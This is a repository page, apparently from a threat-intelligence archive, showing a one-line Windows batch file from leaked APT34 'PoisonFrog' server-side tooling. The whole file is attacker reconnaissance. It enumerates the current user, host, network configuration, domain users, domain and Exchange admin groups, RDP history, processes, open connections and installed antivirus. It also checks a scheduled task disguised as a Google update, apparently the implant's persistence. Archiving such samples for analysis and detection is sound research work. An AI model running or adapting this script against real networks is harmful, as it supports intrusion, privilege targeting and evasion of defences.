Files
APT_REPORT/APT34/APT34-LeakCode/posionfrog/serverside/0000000000.bat
blackorbird b3c7e3e449 APT34
2019-04-18 11:19:12 +08:00

1 line
1.8 KiB
Batchfile

@echo off&echo ________________________________Whoami______________________________ & whoami &echo ________________________________HostName______________________________ & hostname & echo ________________________________IpConfig______________________________ & ipconfig /all & echo ____________________________AllLocalUsers___________________________ & net user /domain & echo _________________________AllUserInDomain___________________________ & net group /domain & echo __________________________DomianAdmins_______________________________ & net group "domain admins" /domain & echo _______________________ExchangetrustedMembers_______________________ & net group "Exchange Trusted Subsystem" /domain & echo ________________________NetAccountDomain____________________________ & net accounts /domain & echo ______________________________NetUser________________________________ & net user & echo _______________________NetLocalGroupMembers________________________ & net localgroup administrators & echo ________________________________netstat_______________________________ & netstat -an & echo ______________________________tasklist________________________________ & tasklist & echo _____________________________systeminfo_______________________________ & systeminfo & echo ________________________________RDP___________________________________ & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" & echo ________________________________Task__________________________________ & schtasks /query /FO List /TN "GoogleUpdatesTaskMachineUI" /V | findstr /b /n /c:"Repeat: Every:" & echo ________________________________________AntiVirus______________________________ &WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List